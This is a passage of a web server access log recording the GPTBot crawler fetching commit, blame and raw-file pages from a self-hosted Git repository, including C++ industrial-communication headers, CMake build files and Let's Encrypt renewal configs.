-] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 74.7.227.38] [Length 12196] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:15:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:15:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 74.7.227.38] [Length 12167] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:15:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 74.7.227.38] [Length 11003] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:15:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:15:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 74.7.227.38] [Length 10986] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:15:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 74.7.227.38] [Length 10988] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:15:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 74.7.227.38] [Length 12199] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 74.7.227.38] [Length 10984] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 74.7.227.38] [Length 12193] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:15:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12046] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12047] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10604] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12047] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 12392] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10608] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11397] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11396] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11397] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12046] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11049] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15179] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11605] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15178] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10221] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 11792] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21647] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9982] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16833] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21643] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16830] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10239] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 